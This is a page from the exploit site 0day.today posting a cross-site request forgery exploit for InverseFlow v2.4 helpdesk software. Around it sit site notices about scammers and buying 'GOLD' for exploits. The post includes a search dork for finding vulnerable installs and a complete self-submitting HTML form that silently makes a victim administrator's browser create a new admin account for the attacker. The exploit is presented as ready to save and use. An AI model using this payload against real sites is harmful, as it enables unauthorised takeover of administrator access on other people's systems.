0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
InverseFlow v2.4 CSRF Vulnerabilities (Add Admin User)
#(+) Exploit Title: InverseFlow v2.4 CSRF Vulnerabilities (Add Admin User) #(+) Version : 2.4 #(+) Author : EjRaM HaCkEr #(+) Contact : m2z()9.cn #(+) Dork : inurl:"ticket.php?cmd=lost" #(+) Software Link : http://asria.info/download/script/inverseflow.zip 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 # All you have to do is save the below code as exploit.html # will automatically add the attacker as Admin without warning ;) # The password will be sent automatically to email ;) Code: <html> <head> </head> <body onload="javascript:fireForms()"> <script language="JavaScript"> var pauses = new Array( "2360" ); function pausecomp(millis) { var date = new Date(); var curDate = null; do { curDate = new Date(); } while(curDate-date < millis); } function fireForms() { var count = 1; var i=0; for(i=0; i<count; i++) { document.forms[i].submit(); pausecomp(pauses[i]); } } </script> <form method="POST" name="form0" action="http://localhost/support/user.php"> <input type="hidden" name="cmd" value="add"/> <input type="hidden" name="name" value="ejram hacker"/> <input type="hidden" name="email" value="ejram@gmail.com"/> </form> </body> </html> ######################################################################## (+)Exploit Coded by: EjRaM HaCkEr (+)Gr33ts to : tryag.cc + r00t-s3c.com + v99x.com :) ######################################################################## # 0day.today [2024-11-15] #